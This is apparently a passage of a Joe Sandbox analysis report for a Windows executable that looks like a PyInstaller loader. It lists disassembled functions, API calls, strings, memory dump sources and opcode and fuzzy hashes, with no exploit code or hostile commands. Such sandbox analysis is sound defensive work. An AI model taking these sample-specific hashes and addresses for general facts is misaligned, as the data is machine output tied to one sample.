                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451BA
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451CB
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451DC
                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF641F4541C), ref: 00007FF641F45203
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4070488512-0
                                                                                                                                                                                                                          • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                          • Instruction ID: 570ae5e0368421c130c17b1d4fac710b277ddf00b0f25bcdca49e0b69b77a866
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BD1AF26A0C64286EBA2FF26D6411B967E1FFA4794F444035EA0DC7AE6DE3CE443C740
                                                                                                                                                                                                                          Function 00007FF641F39924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                                                                          • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                          • Instruction ID: 56e331d574f9b7292cf808136d846f354e5c9cdf24d60632d503383391d60e8f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D315E36618B8586DBA1EF25E8403AE73A4FB88754F540135EA9D83B99DF3CC146CB00
                                                                                                                                                                                                                          Function 00007FF641F40B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2227656907-0
                                                                                                                                                                                                                          • Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                                          • Instruction ID: c58c5706480dd2b1b8221871b8b8fa46d39e80b13609c015100e19fb8cdcbe6c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FB19622B1C69681EBA2BB2196106F963E0FB64BE4F445131EE5D87BD6DE3CE447C700
                                                                                                                                                                                                                          Function 00007FF641F4518C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451BA
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F44908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F4491C
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451CB
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F448A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F448BC
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451DC
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F448D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F448EC
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: RtlFreeHeap.NTDLL(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C6E
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: GetLastError.KERNEL32(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C78
                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF641F4541C), ref: 00007FF641F45203
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3458911817-0
                                                                                                                                                                                                                          • Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                                          • Instruction ID: 8c87b41562eb635765a79be36bba81775fb47de72bd49f09d5dc3db6a7a024d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97517F32A0C64686E7A1FF21E9811A963E1BB68784F405136EA4DD7AE6DF3CF443C740
                                                                                                                                                                                                                          Function 00007FF641F250B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F250C0
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F25101
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F25126
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F2514B
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F25173
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F2519B
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F251C3
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F251EB
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F25213
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                                          • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                          • API String ID: 190572456-2007157414
                                                                                                                                                                                                                          • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                          • Instruction ID: 22952cf2cef003488a699aff75332d3deffc794e9a9bd0317f4135eaaf6fa0f9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77127D64A0EB8791FBD7FB48AE101F422E4AF68751B942535C80E932E4FF7DB54B8240
                                                                                                                                                                                                                          Function 00007FF641F26EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                                          • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                          • API String ID: 190572456-3427451314
                                                                                                                                                                                                                          • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                          • Instruction ID: ebdf822f243a967f9777f26f4938f09610d36d8d15919acd2b159c0f6ec92864
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1E19564A1DF87A0FBDBFB44AA501B423E9AF64761F941135C84E833E4EF7DA54B8204
                                                                                                                                                                                                                          Function 00007FF641F277D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F286B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF641F23FA4,00000000,00007FF641F21925), ref: 00007FF641F286E9
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,00007FF641F27C97,?,?,FFFFFFFF,00007FF641F23834), ref: 00007FF641F2782C
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F226C0: MessageBoxW.USER32 ref: 00007FF641F22736
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                          • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                          • API String ID: 1662231829-930877121
                                                                                                                                                                                                                          • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                                                                          • Instruction ID: 1205b9d4a8794b4b05d6b2582e8ba1431f56c80081daf76bc07add8da14bccdd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73419221B2DA8291FBE2FB24D9512FA73D1AFA4780F444431DA4EC36D6EE6DE5068340
                                                                                                                                                                                                                          Function 00007FF641F220F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                          • String ID: P%
                                                                                                                                                                                                                          • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                          • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                          • Instruction ID: 23eb9f18a61af0c36d1522d4a532543ae216a45e76d66e396d63642e3beb53a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D51F736618BA186D774AF26A4181BAB7A1F798B61F004131EFDE83795DF3CD046DB10
                                                                                                                                                                                                                          Function 00007FF641F355A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 493COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: -$:$f$p$p
                                                                                                                                                                                                                          • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                          • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                          • Instruction ID: 04420fb672afb040d2cf50076605535efed07623a94460eaabdfaaa4d9459c3e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1912B361E0D24B86FBA6BA14D05427972D1FBC0750F984136D68A87EE4DF3CF5939B02
                                                                                                                                                                                                                          Function 00007FF641F302E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: f$f$p$p$f
                                                                                                                                                                                                                          • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                          • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                                          • Instruction ID: 007eeee947f1ecfb85f09cf240f5b90c73416b07d560507c2711c85c469b89a5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1129361A0C14B86FBA6BA14E0547BA72D1FB80754F944133DA8A87EC4DF3CE583DB52
                                                                                                                                                                                                                          Function 00007FF641F21050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                          • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                          • Opcode ID: 13b283e47d001d0ab3171adc0de6fd131dc6445b0413af453990f9875fb5be0d
                                                                                                                                                                                                                          • Instruction ID: 47ff2a3f61ccf2f784d674af3578dbfd82126bda13b9ca3fa887e2c1d02b8344
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13b283e47d001d0ab3171adc0de6fd131dc6445b0413af453990f9875fb5be0d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD418C21B0C68642FBA2BB92A9405FAA3D1BB54BC4F544031DD4D87BD6EF3EE4078308
                                                                                                                                                                                                                          Function 00007FF641F21440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
